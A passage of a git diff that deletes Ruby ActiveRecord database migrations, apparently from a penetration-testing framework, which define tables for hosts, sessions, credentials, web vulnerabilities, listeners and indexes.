:pname - t.text :proof - t.integer :risk - t.string :name, :limit => 1024 - end - - end - - def self.down - drop_table :web_sites - drop_table :web_pages - drop_table :web_forms - drop_table :web_vulns - end -end - - diff --git a/data/sql/migrate/20101002000000_add_query.rb b/data/sql/migrate/20101002000000_add_query.rb deleted file mode 100755 index f22d0f2954..0000000000 --- a/data/sql/migrate/20101002000000_add_query.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddQuery < ActiveRecord::Migration - def self.up - add_column :web_forms, :query, :text - add_column :web_vulns, :query, :text - end - def self.down - remove_column :web_forms, :query - remove_column :web_vulns, :query - end -end diff --git a/data/sql/migrate/20101007000000_add_vuln_info.rb b/data/sql/migrate/20101007000000_add_vuln_info.rb deleted file mode 100755 index 34c1eb3fd9..0000000000 --- a/data/sql/migrate/20101007000000_add_vuln_info.rb +++ /dev/null @@ -1,15 +0,0 @@ -class AddVulnInfo < ActiveRecord::Migration - def self.up - add_column :web_vulns, :category, :text - add_column :web_vulns, :confidence, :text - add_column :web_vulns, :description, :text - add_column :web_vulns, :blame, :text - end - def self.down - remove_column :web_forms, :category - remove_column :web_vulns, :confidence - remove_column :web_vulns, :description - remove_column :web_vulns, :blame - end -end - diff --git a/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb b/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb deleted file mode 100755 index 6281f91343..0000000000 --- a/data/sql/migrate/20101008111800_add_clients_to_campaigns.rb +++ /dev/null @@ -1,10 +0,0 @@ - -class AddClientsToCampaigns < ActiveRecord::Migration - def self.up - add_column :clients, :campaign_id, :integer - end - - def self.down - remove_column :clients, :campaign_id - end -end diff --git a/data/sql/migrate/20101009023300_add_campaign_attachments.rb b/data/sql/migrate/20101009023300_add_campaign_attachments.rb deleted file mode 100755 index 6baf770f29..0000000000 --- a/data/sql/migrate/20101009023300_add_campaign_attachments.rb +++ /dev/null @@ -1,15 +0,0 @@ - - -class AddCampaignAttachments < ActiveRecord::Migration - - def self.up - add_column :attachments, :campaign_id, :integer - end - - def self.down - remove_column :attachments, :campaign_id - end - -end - - diff --git a/data/sql/migrate/20101104135100_add_imported_creds.rb b/data/sql/migrate/20101104135100_add_imported_creds.rb deleted file mode 100755 index 92eb12d474..0000000000 --- a/data/sql/migrate/20101104135100_add_imported_creds.rb +++ /dev/null @@ -1,17 +0,0 @@ -class AddImportedCreds < ActiveRecord::Migration - - def self.up - create_table :imported_creds do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :user, :limit => 512 - t.string :pass, :limit => 512 - t.string :ptype, :limit => 16, :default => "password" - end - end - - def self.down - drop_table :imported_creds - end - -end - diff --git a/data/sql/migrate/20101203000000_fix_web_tables.rb b/data/sql/migrate/20101203000000_fix_web_tables.rb deleted file mode 100755 index 2056369ed7..0000000000 --- a/data/sql/migrate/20101203000000_fix_web_tables.rb +++ /dev/null @@ -1,34 +0,0 @@ -class FixWebTables < ActiveRecord::Migration - - def self.up - change_column :web_pages, :path, :text - change_column :web_pages, :query, :text - change_column :web_pages, :cookie, :text - change_column :web_pages, :auth, :text - change_column :web_pages, :ctype, :text - change_column :web_pages, :location, :text - change_column :web_pages, :path, :text - change_column :web_vulns, :path, :text - change_column :web_vulns, :pname, :text - - add_column :web_pages, :request, :text - add_column :web_vulns, :request, :text - end - - def self.down - change_column :web_pages, :path, :text - change_column :web_pages, :query, :text - change_column :web_pages, :cookie, :text - change_column :web_pages, :auth, :text - change_column :web_pages, :ctype, :text - change_column :web_pages, :location, :text - change_column :web_pages, :path, :text - change_column :web_vulns, :path, :text - change_column :web_vulns, :pname, :text - - remove_column :web_pages, :request - remove_column :web_vulns, :request - end -end - - diff --git a/data/sql/migrate/20101203000001_expand_host_comment.rb b/data/sql/migrate/20101203000001_expand_host_comment.rb deleted file mode 100755 index 1a0bc1bc51..0000000000 --- a/data/sql/migrate/20101203000001_expand_host_comment.rb +++ /dev/null @@ -1,12 +0,0 @@ -class ExpandHostComment < ActiveRecord::Migration - - def self.up - change_column :hosts, :comments, :text - end - - def self.down - change_column :hosts, :comments, :string, :limit => 4096 - end -end - - diff --git a/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb deleted file mode 100755 index 7365e14f9d..0000000000 --- a/data/sql/migrate/20101206212033_add_limit_to_network_to_workspaces.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddLimitToNetworkToWorkspaces < ActiveRecord::Migration - def self.up - add_column :workspaces, :limit_to_network, :boolean, :null => false, :default => false - end - - def self.down - remove_column :workspaces, :limit_to_network - end -end diff --git a/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb b/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb deleted file mode 100755 index f41bc6a813..0000000000 --- a/data/sql/migrate/20110112154300_add_module_uuid_to_tasks.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddModuleUuidToTasks < ActiveRecord::Migration - def self.up - add_column :tasks, :module_uuid, :string, :limit => 8 - end - - def self.down - remove_column :tasks, :module_uuid - end -end diff --git a/data/sql/migrate/20110204112800_add_host_tags.rb b/data/sql/migrate/20110204112800_add_host_tags.rb deleted file mode 100755 index d07c885c35..0000000000 --- a/data/sql/migrate/20110204112800_add_host_tags.rb +++ /dev/null @@ -1,28 +0,0 @@ -class AddHostTags < ActiveRecord::Migration - - def self.up - - create_table :tags do |t| - t.integer :user_id - t.string :name, :limit => 1024 - t.text :desc - t.boolean :report_summary, :null => false, :default => false - t.boolean :report_detail, :null => false, :default => false - t.boolean :critical, :null => false, :default => false - t.timestamps - end - - create_table :hosts_tags, :id => false do |t| - t.integer :host_id - t.integer :tag_id - end - - end - - def self.down - drop_table :hosts_tags - drop_table :tags - end - -end - diff --git a/data/sql/migrate/20110317144932_add_session_table.rb b/data/sql/migrate/20110317144932_add_session_table.rb deleted file mode 100755 index 15ac8852bb..0000000000 --- a/data/sql/migrate/20110317144932_add_session_table.rb +++ /dev/null @@ -1,110 +0,0 @@ -class AddSessionTable < ActiveRecord::Migration - - class Event < ActiveRecord::Base - serialize :info - end - - class SessionEvent < ActiveRecord::Base - belongs_to :session - end - - class Session < ActiveRecord::Base - has_many :events, :class_name => 'AddSessionTable::SessionEvent' - serialize :datastore - end - - def self.up - - create_table :sessions do |t| - t.integer :host_id - - t.string :stype # session type: meterpreter, shell, etc - t.string :via_exploit # module name - t.string :via_payload # payload name - t.string :desc # session description - t.integer :port - t.string :platform # platform type of the remote system - t.string :routes - - t.text :datastore # module's datastore - - t.timestamp :opened_at, :null => false - t.timestamp :closed_at - - t.string :close_reason - end - - create_table :session_events do |t| - t.integer :session_id - - t.string :etype # event type: command, output, upload, download, filedelete - t.binary :command - t.binary :output - t.string :remote_path - t.string :local_path - - t.timestamp :created_at - end - - # - # Migrate session data from events table - # - - close_events = Event.find_all_by_name("session_close") - open_events = Event.find_all_by_name("session_open") - - command_events = Event.find_all_by_name("session_command") - output_events = Event.find_all_by_name("session_output") - upload_events = Event.find_all_by_name("session_upload") - download_events = Event.find_all_by_name("session_download") - - open_events.each do |o| - c = close_events.find { |e| e.info[:session_uuid] == o.info[:session_uuid] } - - s = Session.new( - :host_id => o.host_id, - :stype => o.info[:session_type], - :via_exploit => o.info[:via_exploit], - :via_payload => o.info[:via_payload], - :datastore => o.info[:datastore], - :opened_at => o.created_at - ) - - if c - s.closed_at = c.created_at - s.desc = c.info[:session_info] - else - # couldn't find the corresponding close event - s.closed_at = s.opened_at - s.desc = "?" - end - - uuid = o.info[:session_uuid] - - command_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "command", :command => e.info[:command] ) - end - - output_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "output", :output => e.info[:output] ) - end - - upload_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "upload", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) - end - - download_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| - s.events.build(:created_at => e.created_at, :etype => "download", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) - end - - s.events.sort_by(&:created_at) - - s.save! - end - end - - def self.down - drop_table :sessions - drop_table :session_events - end -end diff --git a/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb b/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb deleted file mode 100755 index 7c0e57c505..0000000000 --- a/data/sql/migrate/20110414180600_add_local_id_to_session_table.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddLocalIdToSessionTable < ActiveRecord::Migration - - def self.up - add_column :sessions, :local_id, :integer - end - - def self.down - remove_column :sessions, :local_id - end - -end diff --git a/data/sql/migrate/20110415175705_add_routes_table.rb b/data/sql/migrate/20110415175705_add_routes_table.rb deleted file mode 100755 index 1eb104f9bf..0000000000 --- a/data/sql/migrate/20110415175705_add_routes_table.rb +++ /dev/null @@ -1,18 +0,0 @@ -class AddRoutesTable < ActiveRecord::Migration - - def self.up - create_table :routes do |t| - t.integer :session_id - t.string :subnet - t.string :netmask - end - - remove_column :sessions, :routes - end - - def self.down - drop_table :routes - - add_column :sessions, :routes, :string - end -end diff --git a/data/sql/migrate/20110422000000_convert_binary.rb b/data/sql/migrate/20110422000000_convert_binary.rb deleted file mode 100755 index 4fa3428ad1..0000000000 --- a/data/sql/migrate/20110422000000_convert_binary.rb +++ /dev/null @@ -1,72 +0,0 @@ -class ConvertBinary < ActiveRecord::Migration - - - class WebPage < ActiveRecord::Base - serialize :headers - end - - class WebVuln < ActiveRecord::Base - serialize :params - end - - def bfilter(str) - str = str.to_s - str.encoding = 'binary' if str.respond_to?('encoding=') - str.gsub(/[\x00\x7f-\xff]/, '') - end - - def self.up - rename_column :web_pages, :body, :body_text - rename_column :web_pages, :request, :request_text - rename_column :web_vulns, :request, :request_text - rename_column :web_vulns, :proof, :proof_text - - add_column :web_pages, :body, :binary - add_column :web_pages, :request, :binary - add_column :web_vulns, :request, :binary - add_column :web_vulns, :proof, :binary - - WebPage.find(:all).each { |r| r.body = r.body_text; r.save! } - WebPage.find(:all).each { |r| r.request = r.request_text; r.save! } - WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! } - WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! } - - remove_column :web_pages, :body_text - remove_column :web_pages, :request_text - remove_column :web_vulns, :request_text - remove_column :web_vulns, :proof_text - - WebPage.connection.schema_cache.clear! - WebPage.reset_column_information - WebVuln.connection.schema_cache.clear! - WebVuln.reset_column_information - end - - def self.down - - rename_column :web_pages, :body, :body_binary - rename_column :web_pages, :request, :request_binary - rename_column :web_vulns, :request, :request_binary - rename_column :web_vulns, :proof, :proof_binary - - add_column :web_pages, :body, :text - add_column :web_pages, :request, :text - add_column :web_vulns, :request, :text - add_column :web_vulns, :proof, :text - - WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! } - WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } - WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! } - WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } - - remove_column :web_pages, :body_binary - remove_column :web_pages, :request_binary - remove_column :web_vulns, :request_binary - remove_column :web_vulns, :proof_binary - - WebPage.connection.schema_cache.clear! - WebPage.reset_column_information - WebVuln.connection.schema_cache.clear! - WebVuln.reset_column_information - end -end diff --git a/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb b/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb deleted file mode 100755 index 48380af6ae..0000000000 --- a/data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb +++ /dev/null @@ -1,8 +0,0 @@ -class AddLastSeenToSessions < ActiveRecord::Migration - def self.up - add_column :sessions, :last_seen, :timestamp - end - def self.down - remove_column :sessions, :last_seen - end -end diff --git a/data/sql/migrate/20110513143900_track_successful_exploits.rb b/data/sql/migrate/20110513143900_track_successful_exploits.rb deleted file mode 100755 index 7c55105fe8..0000000000 --- a/data/sql/migrate/20110513143900_track_successful_exploits.rb +++ /dev/null @@ -1,31 +0,0 @@ -class TrackSuccessfulExploits < ActiveRecord::Migration - - - class ExploitedHost < ActiveRecord::Base - end - - class Vuln < ActiveRecord::Base - end - - def self.up - add_column :vulns, :exploited_at, :timestamp - - # Migrate existing exploited_hosts entries - - ExploitedHost.find(:all).select {|x| x.name}.each do |exploited_host| - next unless(exploited_host.name =~ /^(exploit|auxiliary)\//) - vulns = Vuln.find_all_by_name_and_host_id(exploited_host.name, exploited_host.host_id) - next if vulns.empty? - vulns.each do |vuln| - vuln.exploited_at = exploited_host.updated_at - vuln.save - end - end - - end - - def self.down - remove_column :vulns, :exploited_at - end - -end diff --git a/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb deleted file mode 100755 index e1b8955b7f..0000000000 --- a/data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb +++ /dev/null @@ -1,26 +0,0 @@ -class RenameAndPruneNessusVulns < ActiveRecord::Migration - - class Vuln < ActiveRecord::Base - end - - # No table changes, just vuln renaming to drop the NSS id - # from those vulns that have it and a descriptive name. - def self.up - Vuln.find(:all).each do |v| - if v.name =~ /^NSS-0?\s*$/ - v.delete - next - end - next unless(v.name =~ /^NSS-[0-9]+\s(.+)/) - new_name = $1 - next if(new_name.nil? || new_name.strip.empty?) - v.name = new_name - v.save! - end - end - - def self.down - say "Cannot un-rename and un-prune NSS vulns for migration 20110517160800." - end - -end diff --git a/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb b/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb deleted file mode 100755 index 5af2d46704..0000000000 --- a/data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddTaskIdToReportsTable < ActiveRecord::Migration - - def self.up - add_column :reports, :task_id, :integer - end - - def self.down - remove_column :reports, :task_id - end - -end diff --git a/data/sql/migrate/20110527000001_add_api_keys_table.rb b/data/sql/migrate/20110527000001_add_api_keys_table.rb deleted file mode 100755 index 13e6ecedd0..0000000000 --- a/data/sql/migrate/20110527000001_add_api_keys_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddApiKeysTable < ActiveRecord::Migration - def self.up - create_table :api_keys do |t| - t.text :token - t.timestamps - end - end - def self.down - drop_table :api_keys - end -end - diff --git a/data/sql/migrate/20110606000001_add_macros_table.rb b/data/sql/migrate/20110606000001_add_macros_table.rb deleted file mode 100755 index bfb8ef6085..0000000000 --- a/data/sql/migrate/20110606000001_add_macros_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddMacrosTable < ActiveRecord::Migration - def self.up - create_table :macros do |t| - t.timestamps - t.text :owner - t.text :name - t.text :description - t.binary :actions - t.binary :prefs - end - end - def self.down - drop_table :macros - end -end - diff --git a/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb b/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb deleted file mode 100755 index e057c2ca20..0000000000 --- a/data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb +++ /dev/null @@ -1,127 +0,0 @@ -class MoveOldImportedCredsToNewFiles < ActiveRecord::Migration - - class ImportedCred < ActiveRecord::Base - end - - class CredFile < ActiveRecord::Base - end - - class Workspace < ActiveRecord::Base - end - - class << self - - def find_or_create_cred_path - cred_files_dir = nil - msf_base = Msf::Config.install_root - pro_base = File.expand_path(File.join(msf_base, "..", "engine", "lib", "pro")) - if File.directory? pro_base - cred_files_dir = File.expand_path(File.join(msf_base, "..", "cred_files")) - FileUtils.mkdir_p(cred_files_dir) unless File.exists?(cred_files_dir) - if File.directory?(cred_files_dir) and File.writable?(cred_files_dir) - end - end - return cred_files_dir - end - - def find_all_imported_creds_by_workspace - valid_ptypes = ["smb_hash", "userpass", "password"] - valid_workspaces = Workspace.all.map {|w| w.id} - creds = {} - ImportedCred.all.each do |cred| - next unless cred.ptype - next unless valid_ptypes.include? cred.ptype - next unless cred.workspace_id - next unless valid_workspaces.include? cred.workspace_id - creds[cred.workspace_id] ||= [] - creds[cred.workspace_id] << cred - end - return creds - end - - def sort_creds_into_file_types(old_creds) - files = {} - old_creds.each do |wid,creds| - filedata = {} - creds.each do |cred| - filedata[cred.ptype] ||= [] - case cred.ptype - when "smb_hash", "userpass" - filedata[cred.ptype] << ("%s %s" % [cred.user,cred.pass]) - when "password" - filedata[cred.ptype] << cred.pass.to_s - end - files[wid] = filedata - end - end - return files - end - - def write_creds_to_files(old_creds,cred_path) - file_data_to_write = sort_creds_into_file_types(old_creds) - files_written = [] - file_data_to_write.each do |wid, fdata_hash| - fdata_hash.each do |ftype,cred_data| - next unless cred_data - next if cred_data.empty? - fname = File.join(cred_path,"creds_#{wid}_#{ftype}-#{Time.now.utc.to_i}.txt") - fdata = cred_data.join("\n") - fh = File.open(fname, "wb") - begin - fh.write fdata - fh.flush - ensure - fh.close - end - files_written << fname - end - end - return files_written - end - - def register_new_files(new_files) - successful_count = 0 - new_files.each do |fname| - next unless File.split(fname).last =~ /^creds_([0-9]+)_(userpass|password|smb_hash)\-[0-9]+\.txt$/ - wid = $1 - next unless Workspace.find(wid) - ftype = $2 - actual_ftype = case ftype - when "smb_hash", "userpass" - "userpass" # They're treated the same - when "password" - "pass" - end - next unless actual_ftype - say "Registering credential file '%s' for workspace %d as type '%s'" % [fname,wid,actual_ftype] - cred_file = CredFile.new - cred_file.workspace_id = wid - cred_file.created_by = "" - cred_file.path = fname - cred_file.name = "#{ftype}.txt" - cred_file.desc = "Migrated #{ftype} credentials" - cred_file.ftype = actual_ftype - if cred_file.save - successful_count += 1 - say "Successfully imported #{ftype} credentials for workspace #{wid}" - end - end - successful_count - end - - end - - def self.up - cred_path = find_or_create_cred_path - if cred_path - old_imported_creds = find_all_imported_creds_by_workspace - new_files = write_creds_to_files(old_imported_creds,cred_path) - successful_count = register_new_files(new_files) - end - end - - # Sorry, can't get the old data back. - def self.down - end - -end diff --git a/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb b/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb deleted file mode 100755 index ee9ee21070..0000000000 --- a/data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddSettingsToTasksTable < ActiveRecord::Migration - - def self.up - add_column :tasks, :settings, :binary - end - - def self.down - remove_column :tasks, :settings - end - -end - diff --git a/data/sql/migrate/20110624000001_add_listeners_table.rb b/data/sql/migrate/20110624000001_add_listeners_table.rb deleted file mode 100755 index c541be2131..0000000000 --- a/data/sql/migrate/20110624000001_add_listeners_table.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddListenersTable < ActiveRecord::Migration - def self.up - create_table :listeners do |t| - t.timestamps - t.integer :workspace_id, :null => false, :default => 1 - t.integer :task_id - t.boolean :enabled, :default => true - t.text :owner - t.text :payload - t.text :address - t.integer :port - t.binary :options - end - end - def self.down - drop_table :listeners - end -end - diff --git a/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb b/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb deleted file mode 100755 index 283d102105..0000000000 --- a/data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddMacroToListenersTable < ActiveRecord::Migration - - def self.up - add_column :listeners, :macro, :text - end - - def self.down - remove_column :listeners, :macro - end - -end - diff --git a/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb b/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb deleted file mode 100755 index 037af40ae1..0000000000 --- a/data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb +++ /dev/null @@ -1,21 +0,0 @@ -class AddNexposeConsolesTable < ActiveRecord::Migration - def self.up - create_table :nexpose_consoles do |t| - t.timestamps - t.boolean :enabled, :default => true - t.text :owner - t.text :address - t.integer :port, :default => 3780 - t.text :username - t.text :password - t.text :status - t.text :version - t.text :cert - t.binary :cached_sites - end - end - def self.down - drop_table :nexpose_consoles - end -end - diff --git a/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb deleted file mode 100755 index 9411724344..0000000000 --- a/data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddNameToNexposeConsolesTable < ActiveRecord::Migration - - def self.up - add_column :nexpose_consoles, :name, :text - end - - def self.down - remove_column :nexpose_consoles, :name - end - -end - diff --git a/data/sql/migrate/20110717000001_add_profiles_table.rb b/data/sql/migrate/20110717000001_add_profiles_table.rb deleted file mode 100755 index c0b8831bf1..0000000000 --- a/data/sql/migrate/20110717000001_add_profiles_table.rb +++ /dev/null @@ -1,15 +0,0 @@ -class AddProfilesTable < ActiveRecord::Migration - def self.up - create_table :profiles do |t| - t.timestamps - t.boolean :active, :default => true - t.text :name - t.text :owner - t.binary :settings - end - end - def self.down - drop_table :profiles - end -end - diff --git a/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb b/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb deleted file mode 100755 index b5fce6fd8f..0000000000 --- a/data/sql/migrate/20110727163801_expand_cred_ptype_column.rb +++ /dev/null @@ -1,9 +0,0 @@ -class ExpandCredPtypeColumn < ActiveRecord::Migration - def self.up - change_column :creds, :ptype, :string, :limit => 256 - end - def self.down - change_column :creds, :ptype, :string, :limit => 16 - end -end - diff --git a/data/sql/migrate/20110730000001_add_initial_indexes.rb b/data/sql/migrate/20110730000001_add_initial_indexes.rb deleted file mode 100755 index 4085f64843..0000000000 --- a/data/sql/migrate/20110730000001_add_initial_indexes.rb +++ /dev/null @@ -1,85 +0,0 @@ -class AddInitialIndexes < ActiveRecord::Migration - def self.up - - - add_index :hosts, :address - add_index :hosts, :address6 - add_index :hosts, :name - add_index :hosts, :state - add_index :hosts, :os_name - add_index :hosts, :os_flavor - add_index :hosts, :purpose - - # Removed (conditionally dropped in the next migration) - # add_index :hosts, :comments - - add_index :services, :port - add_index :services, :proto - add_index :services, :state - add_index :services, :name - - # Removed (conditionally dropped in the next migration) - # add_index :services, :info - - add_index :notes, :ntype - - add_index :vulns, :name - - # Removed (conditionally dropped in the next migration) - # add_index :vulns, :info - - add_index :refs, :name - - add_index :web_sites, :vhost - add_index :web_sites, :comments - add_index :web_sites, :options - - add_index :web_pages, :path - add_index :web_pages, :query - - add_index :web_forms, :path - - add_index :web_vulns, :path - add_index :web_vulns, :method - add_index :web_vulns, :name - end - - def self.down - - remove_index :hosts, :address - remove_index :hosts, :address6 - remove_index :hosts, :name - remove_index :hosts, :state - remove_index :hosts, :os_name - remove_index :hosts, :os_flavor - remove_index :hosts, :purpose - remove_index :hosts, :comments - - remove_index :services, :port - remove_index :services, :proto - remove_index :services, :state - remove_index :services, :name - remove_index :services, :info - - remove_index :notes, :ntype - - remove_index :vulns, :name - remove_index :vulns, :info - - remove_index :refs, :name - - remove_index :web_sites, :vhost - remove_index :web_sites, :comments - remove_index :web_sites, :options - - remove_index :web_pages, :path - remove_index :web_pages, :query - - remove_index :web_forms, :path - - remove_index :web_vulns, :path - remove_index :web_vulns, :method - remove_index :web_vulns, :name - end -end - diff --git a/data/sql/migrate/20110812000001_prune_indexes.rb b/data/sql/migrate/20110812000001_prune_indexes.rb deleted file mode 100755 index 54b681f273..0000000000 --- a/data/sql/migrate/20110812000001_prune_indexes.rb +++ /dev/null @@ -1,23 +0,0 @@ -class PruneIndexes < ActiveRecord::Migration - def self.up - - if indexes(:hosts).map{|x| x.columns }.flatten.include?("comments") - remove_index :hosts, :comments - end - - if indexes(:services).map{|x| x.columns }.flatten.include?("info") - remove_index :services, :info - end - - if indexes(:vulns).map{|x| x.columns }.flatten.include?("info") - remove_index :vulns, :info - end - end - - def self.down - add_index :hosts, :comments - add_index :services, :info - add_index :vulns, :info - end -end - diff --git a/data/sql/migrate/20110922000000_expand_notes.rb b/data/sql/migrate/20110922000000_expand_notes.rb deleted file mode 100755 index 4e77303fa0..0000000000 --- a/data/sql/migrate/20110922000000_expand_notes.rb +++ /dev/null @@ -1,9 +0,0 @@ -class ExpandNotes < ActiveRecord::Migration - def self.up - change_column :notes, :data, :text - end - def self.down - change_column :notes, :data, :string, :limit => 65536 - end -end - diff --git a/data/sql/migrate/20110928101300_add_mod_ref_table.rb b/data/sql/migrate/20110928101300_add_mod_ref_table.rb deleted file mode 100755 index 24f16d642f..0000000000 --- a/data/sql/migrate/20110928101300_add_mod_ref_table.rb +++ /dev/null @@ -1,17 +0,0 @@ -# Probably temporary, a spot to stash module names and their associated refs -# Don't count on it being populated at any given moment. -class AddModRefTable < ActiveRecord::Migration - - def self.up - create_table :mod_refs do |t| - t.string :module, :limit => 1024 - t.string :mtype, :limit => 128 - t.text :ref - end - end - - def self.down - drop_table :mod_refs - end - -end diff --git a/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb b/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb deleted file mode 100755 index f0c54fed98..0000000000 --- a/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb +++ /dev/null @@ -1,24 +0,0 @@ -class AddDisplayNameToReportsTable < ActiveRecord::Migration - - class Report < ActiveRecord::Base - end - - def self.up - - add_column :reports, :name, :string, :limit => 63 - - # Migrate to have a default name. - - Report.find(:all).each do |report| - rtype = report.rtype.to_s =~ /^([A-Z0-9]+)\x2d/i ? $1 : "AUDIT" - default_name = rtype[0,57].downcase.capitalize + "-" + report.id.to_s[0,5] - report.name = default_name - report.save - end - end - - def self.down - remove_column :reports, :name - end - -end diff --git a/data/sql/migrate/20111203000000_inet_columns.rb b/data/sql/migrate/20111203000000_inet_columns.rb deleted file mode 100755 index 6e86654bc5..0000000000 --- a/data/sql/migrate/20111203000000_inet_columns.rb +++ /dev/null @@ -1,13 +0,0 @@ -class InetColumns < ActiveRecord::Migration - - def self.up - change_column :hosts, :address, 'INET using address::INET' - remove_column :hosts, :address6 - end - - def self.down - change_column :hosts, :address, :text - add_column :hosts, :address6, :text - end - -end diff --git a/data/sql/migrate/20111204000000_more_inet_columns.rb b/data/sql/migrate/20111204000000_more_inet_columns.rb deleted file mode 100755 index 56adf64625..0000000000 --- a/data/sql/migrate/20111204000000_more_inet_columns.rb +++ /dev/null @@ -1,17 +0,0 @@ -class MoreInetColumns < ActiveRecord::Migration - - def self.up - change_column :wmap_requests, :address, 'INET using address::INET' - remove_column :wmap_requests, :address6 - change_column :wmap_targets, :address, 'INET using address::INET' - remove_column :wmap_targets, :address6 - end - - def self.down - change_column :wmap_requests, :address, :string, :limit => 16 - add_column :wmap_requests, :address6, :string, :limit => 255 - change_column :wmap_targets, :address, :string, :limit => 16 - add_column :wmap_targets, :address6, :string, :limit => 255 - end - -end diff --git a/data/sql/migrate/20111210000000_add_scope_to_hosts.rb b/data/sql/migrate/20111210000000_add_scope_to_hosts.rb deleted file mode 100755 index 2bbe8f9f77..0000000000 --- a/data/sql/migrate/20111210000000_add_scope_to_hosts.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddScopeToHosts < ActiveRecord::Migration - def self.up - add_column :hosts, :scope, :text - end - - def self.down - remove_column :hosts, :scope - end -end diff --git a/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb b/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb deleted file mode 100755 index 5e9833d884..0000000000 --- a/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddVirtualHostToHosts < ActiveRecord::Migration - def self.up - add_column :hosts, :virtual_host, :text - end - - def self.down - remove_column :hosts, :viritual_host - end -end diff --git a/data/sql/migrate/20120411173220_rename_workspace_members.rb b/data/sql/migrate/20120411173220_rename_workspace_members.rb deleted file mode 100755 index 75003d6d36..0000000000 --- a/data/sql/migrate/20120411173220_rename_workspace_members.rb +++ /dev/null @@ -1,9 +0,0 @@ -class RenameWorkspaceMembers < ActiveRecord::Migration - def up - rename_table :project_members, :workspace_members - end - - def down - rename_table :workspace_members, :project_members - end -end diff --git a/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb b/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb deleted file mode 100755 index fcd2f9e0ca..0000000000 --- a/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb +++ /dev/null @@ -1,21 +0,0 @@ -class AddCounterCachesToHosts < ActiveRecord::Migration - - def self.up - add_column :hosts, :note_count, :integer, :default => 0 - add_column :hosts, :vuln_count, :integer, :default => 0 - add_column :hosts, :service_count, :integer, :default => 0 - - Mdm::Host.reset_column_information - Mdm::Host.all.each do |h| - Mdm::Host.reset_counters h.id, :notes - Mdm::Host.reset_counters h.id, :vulns - Mdm::Host.reset_counters h.id, :services - end - end - - def self.down - remove_column :hosts, :note_count - remove_column :hosts, :vuln_count - remove_column :hosts, :service_count - end -end \ No newline at end of file diff --git a/data/sql/migrate/20120625000000_add_vuln_details.rb b/data/sql/migrate/20120625000000_add_vuln_details.rb deleted file mode 100755 index 0f946da39c..0000000000 --- a/data/sql/migrate/20120625000000_add_vuln_details.rb +++ /dev/null @@ -1,34 +0,0 @@ -class AddVulnDetails < ActiveRecord::Migration - - def self.up - create_table :vuln_details do |t| - t.integer :vuln_id # Vuln table reference - t.float :cvss_score # 0.0 to 10.0 - t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C) - - t.string 